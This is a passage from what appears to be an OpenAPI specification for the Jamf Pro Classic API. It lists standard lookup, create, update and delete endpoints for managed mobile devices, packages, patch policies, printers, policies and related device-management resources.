description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceGroupsByName
summary: Finds mobile device groups by name
'/mobiledevicehistory/id/{id}':
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevicehistory
operationId: findMobileDeviceHistoryById
summary: Finds mobile device history by id
'/mobiledevicehistory/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicehistory
description: 'Displays information specified with the {subset} parameter for a mobile device specified with the {id} parameter. Lookup by name, UDID, serial number, or mac address are also supported. For example, /mobiledevicehistory/id/3/subset/General&UserLocation&Applications or /mobiledevicehistory/id/3/subset/General&Audits or /mobiledevicehistory/name/MyIPad/subset/General.'
operationId: findMobileDeviceHistoryByIdSubset
summary: Display subsets of information for a mobile device history
'/mobiledevicehistory/macaddress/{macaddress}':
get:
parameters:
- description: Mac address to filter by
in: path
name: macaddress
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicehistory
operationId: findMobileDeviceHistoryByMacAddress
summary: Finds mobile device history by wifi mac address
'/mobiledevicehistory/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicehistory
operationId: findMobileDeviceHistoryByName
summary: Finds mobile device history by name
'/mobiledevicehistory/serialnumber/{serialnumber}':
get:
parameters:
- description: Serial number to filter by
in: path
name: serialnumber
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicehistory
operationId: findMobileDeviceHistoryBySerialNumber
summary: Finds mobile device history by serial number
'/mobiledevicehistory/udid/{udid}':
get:
parameters:
- description: UDID to filter by
in: path
name: udid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevicehistory
operationId: findMobileDeviceHistoryByUDID
summary: Finds mobile device history by UDID
/mobiledeviceinvitations:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledeviceinvitations
operationId: findMobileDeviceInvitations
summary: Finds all mobile device invitations
'/mobiledeviceinvitations/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceinvitations
operationId: deleteMobileDeviceInvitationById
summary: Deletes a mobile device invitation by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceinvitations
operationId: findMobileDeviceInvitationsById
summary: Finds mobile device invitations by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceinvitations
operationId: createMobileDeviceInvitationById
summary: Creates a new mobile device invitation by id
'/mobiledeviceinvitations/invitation/{invitation}':
get:
parameters:
- description: Invitation to filter by
in: path
name: invitation
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceinvitations
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceInvitationsByInvitation
summary: Finds mobile device invitations by invitation
/mobiledeviceprovisioningprofiles:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
operationId: findMobileDeviceProvisioningProfiles
summary: Finds all mobile device provisioning profiles
'/mobiledeviceprovisioningprofiles/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
operationId: deleteMobileDeviceProvisioningProfileById
summary: Deletes a mobile device provisioning profile by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
operationId: findMobileDeviceProvisioningProfilesById
summary: Finds mobile device provisioning profiles by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
operationId: createMobileDeviceProvisioningProfileById
summary: Creates a new mobile device provisioning profile by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
operationId: updateMobileDeviceProvisioningProfileById
summary: Updates an existing mobile device provisioning profile by id
'/mobiledeviceprovisioningprofiles/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
description: 'Displays information specified with the {subset} parameter for a mobile device provisioning profile specified with the {id} parameter. Lookup by name and UUID are also supported. For example, /mobiledeviceprovisioningprofiles/id/3/subset/General.'
operationId: findMobileDeviceProvisioningProfileByIdSubset
summary: Display subsets of information for a mobile device provisioning profile
'/mobiledeviceprovisioningprofiles/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceProvisioningProfilesByName
summary: Finds mobile device provisioning profiles by name
'/mobiledeviceprovisioningprofiles/uuid/{uuid}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledeviceprovisioningprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDeviceProvisioningProfilesByUUID
summary: Finds mobile device provisioning profiles by uuid
/mobiledevices:
get:
responses:
'200':
description: No response was specified
tags:
- mobiledevices
operationId: findMobileDevices
summary: Finds all mobile devices
'/mobiledevices/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevices
operationId: deleteMobileDeviceById
summary: Deletes a mobile device by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: Includes a subset for Android devices if applicable.
operationId: findMobileDevicesById
summary: Finds mobile devices by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'To distinguish between mobile device types (e.g., iPad, iPhone, or Apple TV), use the <model_identifier> field. Default mobile device type is ''Unknown''. Can include a subset for Android devices if applicable. <os_name> in <android> is derived from the API level and cannot be set.'
operationId: createMobileDeviceById
summary: Creates a new mobile device by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: Can include a subset for Android devices if applicable. <os_name> in <android> is derived from the api level and cannot be set.
operationId: updateMobileDeviceById
summary: Updates an existing mobile device by id
'/mobiledevices/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'Displays information specified with the {subset} parameter for a mobile device specified with the {id} parameter. Lookup by name, UDID, serial number, or mac address are also supported. For example, /mobiledevices/id/3/subset/General&Location&Purchasing or /mobiledevices/id/3/subset/General&Android or /mobiledevices/name/MyIPad/subset/General.'
operationId: findMobileDevicesByIdSubset
summary: Display subsets of information for a mobile device
'/mobiledevices/macaddress/{macaddress}':
get:
parameters:
- description: Mac address to filter by
in: path
name: macaddress
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDevicesByMacAddress
summary: Finds mobile devices by wifi mac address
'/mobiledevices/match/{match}':
get:
parameters:
- description: 'Name, mac address, etc. to filter by. Match uses the same format as the general search in Jamf Pro. For instance, admin* can be used to match mobile device names that begin with admin'
in: path
name: match
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'GET mobile devices with a value equal to the {match} parameter.'
operationId: matchMobileDevices
summary: Searches for mobile devices that match the provided parameter
'/mobiledevices/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDevicesByName
summary: Finds mobile devices by name
'/mobiledevices/serialnumber/{serialnumber}':
get:
parameters:
- description: Serial number to filter by
in: path
name: serialnumber
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDevicesBySerialNumber
summary: Finds mobile devices by serial number
'/mobiledevices/udid/{udid}':
get:
parameters:
- description: UDID to filter by
in: path
name: udid
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- mobiledevices
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findMobileDevicesByUDID
summary: Finds mobile devices by UDID
/netbootservers:
get:
responses:
'200':
description: No response was specified
tags:
- netbootservers
operationId: findNetbootServers
summary: Finds all netboot servers
'/netbootservers/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- netbootservers
operationId: deleteNetbootServerById
summary: Deletes a netboot server by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- netbootservers
operationId: findNetbootServersById
summary: Finds netboot servers by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- netbootservers
operationId: createNetbootServerById
summary: Creates a new netboot server by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- netbootservers
operationId: updateNetbootServerById
summary: Updates an existing netboot server by id
'/netbootservers/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- netbootservers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findNetbootServersByName
summary: Finds netboot servers by name
/networksegments:
get:
responses:
'200':
description: No response was specified
tags:
- networksegments
operationId: findNetworkSegments
summary: Finds all network segments
'/networksegments/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- networksegments
operationId: deleteNetworkSegmentById
summary: Deletes a network segment by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- networksegments
operationId: findNetworkSegmentsById
summary: Finds network segments by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- networksegments
operationId: createNetworkSegmentById
summary: Creates a new network segment by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- networksegments
operationId: updateNetworkSegmentById
summary: Updates an existing network segment by id
'/networksegments/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- networksegments
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findNetworkSegmentsByName
summary: Finds network segments by name
/osxconfigurationprofiles:
get:
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
operationId: findOsxConfigurationProfiles
summary: Finds all OS X configuration profiles
'/osxconfigurationprofiles/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
operationId: deleteOsxConfigurationProfileById
summary: Deletes a OS X configuration profile by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
operationId: findOsxConfigurationProfilesById
summary: Finds OS X configuration profiles by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
operationId: createOsxConfigurationProfileById
summary: Creates a new OS X configuration profile by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
operationId: updateOsxConfigurationProfileById
summary: Updates an existing OS X configuration profile by id
'/osxconfigurationprofiles/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
description: 'Displays information specified with the {subset} parameter for a configuration specified with the {id} parameter. Lookup by name is also supported. For example, /osxconfigurationprofiles/id/3/subset/General&Scope or /osxconfigurationprofiles/name/MyCP/subset/General.'
operationId: findOsxConfigurationProfilesByIdSubset
summary: Display subsets of information for an OS X configuration profile
'/osxconfigurationprofiles/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- osxconfigurationprofiles
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findOsxConfigurationProfilesByName
summary: Finds OS X configuration profiles by name
/packages:
get:
responses:
'200':
description: No response was specified
tags:
- packages
operationId: findPackages
summary: Finds all packages
'/packages/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- packages
operationId: deletePackageById
summary: Deletes a package by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- packages
operationId: findPackagesById
summary: Finds packages by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- packages
operationId: createPackageById
summary: Creates a new package by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- packages
operationId: updatePackageById
summary: Updates an existing package by id
'/packages/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- packages
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findPackagesByName
summary: Finds packages by name
'/patchavailabletitles/sourceid/{id}':
get:
parameters:
- description: ID value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchavailabletitles
operationId: findAvailableTitlesBySourceId
summary: Finds all available title from a source by Id
/patches:
get:
responses:
'200':
description: No response was specified
tags:
- patches
operationId: findPatches
summary: Finds all patches (Deprecated)
'/patches/id/{id}':
delete:
parameters:
- description: Id value to update by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patches
description: 'You can DELETE using the resource URLs with parameters of {name}.'
operationId: deleteSoftwareTitlesById
summary: Deletes a Patch Software Title by ID (Deprecated)
get:
parameters:
- description: ID value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patches
operationId: findPatchesById
summary: Finds patches by ID (Deprecated)
post:
parameters:
- description: ID value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patches
operationId: createPatchesById
summary: Creates new patches by ID (Deprecated)
put:
parameters:
- description: Id value to update by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patches
description: 'You can PUT using the resource URLs with parameters of {id}.'
operationId: updateSoftwareTitlesById
summary: Updates a Patch Software Title by ID (Deprecated)
'/patches/id/{id}/version/{version}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: Latest
description: Version number to filter by
in: path
name: version
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- patches
description: 'Displays information specified with the {version} parameter for a patch specified with the {id} parameter. Lookup by name is also supported. For example, /patches/id/3/version/45.0.2 or /patches/name/Mozilla Firefox/version/45.0.2. A version number of ''Latest'' and ''Unknown'' will also work.'
operationId: findComputersByTitleVersion
summary: Display computers on a specific version (Deprecated)
'/patches/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- patches
operationId: findPatchesByName
summary: Finds the first patch with the name provided (Deprecated)
/patchexternalsources:
get:
responses:
'200':
description: No response was specified
tags:
- patchexternalsources
operationId: findPatchExternalSources
summary: Finds all patch external sources
'/patchexternalsources/id/{id}':
' delete':
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchexternalsources
operationId: deletePatchExternalSourcesById
summary: Deletes a patch external source by Id
get:
parameters:
- description: ID value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchexternalsources
operationId: findPatchExternalSourcesById
summary: Finds a patch external source by Id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchexternalsources
operationId: createPatchExternalSourcesById
summary: Create a new patch external source by Id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchexternalsources
operationId: updatePatchExternalSourcesById
summary: Updates a patch external source by Id
'/patchexternalsources/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- patchexternalsources
description: 'You can PUT, POST using this resource URL.'
operationId: findPatchExternalSourcesByName
summary: Finds the first patch external source with the name provided
/patchinternalsources:
get:
responses:
'200':
description: No response was specified
tags:
- patchinternalsources
operationId: findPatchInternalSources
summary: Finds all patch internal sources
'/patchinternalsources/id/{id}':
get:
parameters:
- description: ID value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchinternalsources
operationId: findPatchInternalSourcesById
summary: Finds a patch internal source by ID
'/patchinternalsources/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- patchinternalsources
operationId: findPatchInternalSourcesByName
summary: Finds the first patch internal source with the name provided
/patchpolicies:
get:
responses:
'200':
description: No response was specified
tags:
- patchpolicies
operationId: findPatchPolicies
summary: Finds all patch policies
'/patchpolicies/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchpolicies
operationId: deletePatchPolicyById
summary: Deletes a patch policy by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchpolicies
operationId: findPatchPolicyById
summary: Finds a patch policy by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchpolicies
operationId: updatePatchPolicyById
summary: Updates an existing patch policy by id
'/patchpolicies/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- patchpolicies
description: 'Displays information specified with the {subset} parameter for a patch policy specified with the {id} parameter. Lookup by name is also supported. For example, /patchpolicies/id/3/subset/General&Scope&UserInteraction or /patchpolicies/id/3/subset/UserInteraction.'
operationId: findPatchPoliciesByIdSubset
summary: Display subsets of information for a patch policy
'/patchpolicies/softwaretitleconfig/id/{softwaretitleconfigid}':
get:
parameters:
- description: Software title config Id value to filter by
in: path
items:
format: int64
type: integer
name: softwaretitleconfigid
required: true
type: array
responses:
'200':
description: No response was specified
tags:
- patchpolicies
operationId: findPatchPoliciesBySoftwareTitleConfigId
summary: Finds all patch policy by software title configuration id
post:
parameters:
- description: Software title config Id value to filter by
format: int64
in: path
name: softwaretitleconfigid
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchpolicies
operationId: createPatchPolicyBySoftwareTitleConfigId
summary: Create a new patch policy by software title configuration id
'/patchreports/patchsoftwaretitleid/{id}':
get:
parameters:
- description: Patch software title id to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchreports
operationId: findPatchReportsByPatchSoftwareTitleId
summary: Finds patch reports by patch software title id
'/patchreports/patchsoftwaretitleid/{id}/version/{version}':
get:
parameters:
- description: Patch software title id to filter by
format: int64
in: path
name: id
required: true
type: integer
- default: Latest
description: Version number to filter by
in: path
name: version
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- patchreports
description: 'Displays report information specified with the {version} parameter for a patch software title specified with the {id} parameter. Lookup by name is not support due to the ability for software titles from different sources to share a common name. For example, /patches/id/3/version/45.0.2. A version number of ''Latest'' and ''Unknown'' will also work.'
operationId: findComputersByTitleVersion
summary: Display computers for a specific version of a patch report
/patchsoftwaretitles:
get:
responses:
'200':
description: No response was specified
tags:
- patchsoftwaretitles
operationId: findPatchSoftwareTitles
summary: Finds all patch software titles
'/patchsoftwaretitles/id/{id}':
delete:
parameters:
- description: id value to update by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchsoftwaretitles
description: 'You can DELETE using the resource URLs with parameters of {name}.'
operationId: deletePatchSoftwareTitlesById
summary: Deletes a patch software title by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchsoftwaretitles
operationId: findPatchSoftwareTitlesById
summary: Finds patch software titles by id
post:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchsoftwaretitles
description: While doing a POST the patch source <source_id> and patch software title <name_id> nodes are required.
operationId: createPatchSoftwareTitleById
summary: Creates new patch software title by id
put:
parameters:
- description: Id value to update by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- patchsoftwaretitles
description: 'You can PUT using the resource URLs with parameters of {id}.'
operationId: updatePatchSoftwareTitlesById
summary: Updates a patch software title by id
/peripherals:
get:
responses:
'200':
description: No response was specified
tags:
- peripherals
operationId: findPeripherals
summary: Finds all peripherals
'/peripherals/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- peripherals
operationId: deletePeripheralById
summary: Deletes a peripheral by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- peripherals
operationId: findPeripheralsById
summary: Finds peripherals by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- peripherals
operationId: createPeripheralById
summary: Creates a new peripheral by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- peripherals
operationId: updatePeripheralById
summary: Updates an existing peripheral by id
'/peripherals/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- peripherals
description: 'Displays information specified with the {subset} parameter for a peripheral specified with the {id} parameter. For example, /peripheral/id/3/subset/General&Location&Purchasing.'
operationId: findPeripheralsByIdSubset
summary: Display subsets of information for a peripheral
/peripheraltypes:
get:
responses:
'200':
description: No response was specified
tags:
- peripheraltypes
operationId: findPeripheralTypes
summary: Finds all peripheral types
'/peripheraltypes/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- peripheraltypes
operationId: deletePeripheralById
summary: Deletes a peripheral by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- peripheraltypes
operationId: findPeripheralTypesById
summary: Finds peripheral types by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- peripheraltypes
operationId: createPeripheralById
summary: Creates a new peripheral by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- peripheraltypes
operationId: updatePeripheralById
summary: Updates an existing peripheral by id
/policies:
get:
responses:
'200':
description: No response was specified
tags:
- policies
operationId: findPolicies
summary: Finds all policies
'/policies/category/{category}':
get:
parameters:
- default: None
description: Category to filter by
in: path
name: category
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- policies
description: 'Category may be specified by id or name, or ''None'' for policies with no category.'
operationId: findPoliciesByCategory
summary: Finds all policies by category
'/policies/createdBy/{createdBy}':
get:
parameters:
- default: jss
description: Type to filter by
in: path
name: createdBy
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- policies
description: Type may be specified by Jamf Pro.
operationId: findPoliciesByType
summary: Finds all policies by type
'/policies/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- policies
operationId: deletePolicyById
summary: Deletes a policy by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- policies
operationId: findPoliciesById
summary: Finds policies by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- policies
operationId: createPolicyById
summary: Creates a new policy by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- policies
description: PUT also works with a name. One or more computers can be added by using <computer_additions> instead of <computers>. One or more computers can be deleted by using <computer_deletions> instead of <computers>
operationId: updatePolicyById
summary: Updates an existing policy by id
'/policies/id/{id}/subset/{subset}':
get:
parameters:
- description: Id to filter by
in: path
name: id
required: true
type: string
- default: General
description: Subset to filter by
in: path
name: subset
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- policies
description: 'Displays information specified with the {subset} parameter for a policy specified with the {id} parameter. Lookup by name is also supported. For example, /policies/id/3/subset/General&Location&Purchasing or /policies/id/3/subset/Purchasing.'
operationId: findPoliciesByIdSubset
summary: Display subsets of information for a policy
'/policies/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- policies
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findPoliciesByName
summary: Finds policies by name
/printers:
get:
responses:
'200':
description: No response was specified
tags:
- printers
operationId: findPrinters
summary: Finds all printers
'/printers/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- printers
operationId: deletePrinterById
summary: Deletes a printer by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- printers
operationId: findPrintersById
summary: Finds printers by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- printers
operationId: createPrinterById
summary: Creates a new printer by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- printers
operationId: updatePrinterById
summary: Updates an existing printer by id
'/printers/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- printers
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findPrintersByName
summary: Finds printers by name
/removablemacaddresses:
get:
responses:
'200':
description: No response was specified
tags:
- removablemacaddresses
operationId: findRemovableMacAddresses
summary: Finds all removablemacaddresses
'/removablemacaddresses/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- removablemacaddresses
operationId: deleteRemovableMacAddressById
summary: Deletes a removableMacAddress by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- removablemacaddresses
operationId: findRemovableMacAddressesById
summary: Finds removablemacaddresses by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- removablemacaddresses
operationId: createRemovableMacAddressById
summary: Creates a new removableMacAddress by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- removablemacaddresses
operationId: updateRemovableMacAddressById
summary: Updates an existing removableMacAddress by id
'/removablemacaddresses/name/{name}':
get:
parameters:
- description: Name to filter by
in: path
name: name
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- removablemacaddresses
description: 'You can PUT, POST, and DELETE using this resource URL.'
operationId: findRemovableMacAddressesByName
summary: Finds removablemacaddresses by name
/restrictedsoftware:
get:
responses:
'200':
description: No response was specified
tags:
- restrictedsoftware
operationId: findRestrictedSoftware
summary: Finds all restricted software
'/restrictedsoftware/id/{id}':
delete:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- restrictedsoftware
operationId: deleteRestrictedSoftwareById
summary: Deletes a restricted software by id
get:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
tags:
- restrictedsoftware
operationId: findRestrictedSoftwareById
summary: Finds restricted software by id
post:
parameters:
- description: Id value to filter by
in: path
name: id
required: true
type: string
responses:
'200':
description: No response was specified
tags:
- restrictedsoftware
operationId: createRestrictedSoftwareById
summary: Creates a new restricted software by id
put:
parameters:
- description: Id value to filter by
format: int64
in: path
name: id
required: true
type: integer
responses:
